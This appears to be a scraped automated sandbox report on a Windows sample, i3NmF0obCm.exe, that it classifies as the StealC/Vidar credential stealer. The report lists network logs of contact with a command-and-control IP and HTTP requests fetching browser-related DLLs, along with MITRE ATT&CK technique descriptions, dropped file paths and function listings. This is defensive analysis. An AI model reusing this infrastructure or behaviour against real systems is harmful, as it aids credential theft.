Source: i3NmF0obCm.exe	String decryptor: message
Source: i3NmF0obCm.exe	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: i3NmF0obCm.exe	String decryptor: screenshot.jpg

Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10

Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report i3NmF0obCm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEBKFIJEGCAAFHJKFCFCAAAAEG

C:\ProgramData\AKFHDBFIDAECAAAKEGDA

C:\ProgramData\DGCBKECAKFBGCAKECGIE

C:\ProgramData\EGCGHCBK

C:\ProgramData\GCGDGHCB

C:\ProgramData\GDGDHJJDGHCAAAKEHIJKEBAEGH

C:\ProgramData\GDHCGDGIEBKJKFHJJKFCBFBGDA

C:\ProgramData\JJKJDAEBFCBKECBGDBFC

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
i3NmF0obCm.exe

Function 00EF76E0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00EEB630 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C4D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00EF3560 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00EF2B70 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133
fileCOMMON

Function 00EF7A60 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Function 00EE7110 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00EEF920 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Function 00EE4DE0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre